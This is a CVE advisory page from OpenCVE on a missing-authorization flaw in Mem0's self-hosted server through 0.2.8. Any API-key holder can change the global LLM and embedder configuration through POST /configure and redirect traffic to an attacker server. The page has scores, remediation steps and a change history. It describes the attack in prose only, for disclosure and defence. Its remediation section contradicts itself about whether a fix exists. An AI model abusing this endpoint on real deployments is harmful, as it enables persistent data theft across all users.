Description
Mem0 versions through 0.2.8, fixed in commit ae7f406, contain a missing authorization vulnerability in the self-hosted server component where the POST /configure endpoint modifies global LLM provider and embedder configuration but only verifies authentication via JWT or X-API-Key without validating the caller's role. Any authenticated user holding a distributed API key can redirect all LLM and embedder traffic to an attacker-controlled server, with the malicious configuration persisted to PostgreSQL and surviving server restarts to affect all users and API keys on the instance.
Published: 2026-06-09
Score: 8.6 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Mem0 versions up to 0.2.8 allow any authenticated user who holds a distributed API key to post changes to the /configure endpoint; however the server does not check the caller’s role before applying the modification. The endpoint changes global LLM provider and embedder settings, and stores the new configuration in PostgreSQL. This persistence means that once altered the configuration survives server restarts and impacts all users and API keys on the instance. The attacker can thus redirect all LLM and embedder traffic to a malicious server, creating a covert channel for data exfiltration or injection of harmful content.

Affected Systems

The vulnerable product is mem0, a self‑hosted AI platform produced by mem0ai. All releases up through 0.2.8 contain the flaw. The vulnerability exists only in the server component handling the POST /configure API call and does not affect the client or web interface directly.

Risk and Exploitability

The CVSS base score of 8.6 classifies this flaw as high severity. Because exploitation requires an authenticated session with a distributed API key, the likelihood of successful attacks is limited to users who can obtain or share such credentials. The EPSS score is not available, and the vulnerability is not listed in the CISA KEV catalog, suggesting that widespread public exploitation has not been reported yet. Nevertheless, the flaw permits a malicious actor to permanently alter the server’s configuration, impacting all users, and could be leveraged for persistent data leakage or injection attacks.

Generated by OpenCVE AI on June 9, 2026 at 16:50 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update mem0 to the latest version that includes commit ae7f406 or to any release newer than 0.2.8
  • If an immediate upgrade is not possible, restrict the POST /configure endpoint to privileged users by configuring the application’s role‑based access control to require an administrator role
  • Revoke all existing distributed API keys and generate new ones after applying the patch or endpoint restriction
  • Monitor the PostgreSQL configuration tables for unexpected changes and enforce audit logging on the /configure endpoint

Generated by OpenCVE AI on June 9, 2026 at 16:50 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 09 Jun 2026 17:15:00 +0000

Type Values Removed Values Added
First Time appeared Mem0ai
Mem0ai mem0
Vendors & Products Mem0ai
Mem0ai mem0

Tue, 09 Jun 2026 15:30:00 +0000

Type Values Removed Values Added
Description Mem0 versions through 0.2.8, fixed in commit ae7f406, contain a missing authorization vulnerability in the self-hosted server component where the POST /configure endpoint modifies global LLM provider and embedder configuration but only verifies authentication via JWT or X-API-Key without validating the caller's role. Any authenticated user holding a distributed API key can redirect all LLM and embedder traffic to an attacker-controlled server, with the malicious configuration persisted to PostgreSQL and surviving server restarts to affect all users and API keys on the instance.
Title Mem0 0.2.8 Missing Authorization via POST /configure Endpoint
Weaknesses CWE-862
References
Metrics cvssV3_1

{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}

cvssV4_0

{'score': 8.6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Mem0ai Mem0
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-06-09T15:34:54.594Z

Reserved: 2026-06-02T16:30:15.232Z

Link: CVE-2026-49948

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Deferred

Published: 2026-06-09T16:16:43.450

Modified: 2026-06-09T19:36:10.547

Link: CVE-2026-49948

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-09T17:00:09Z

Weaknesses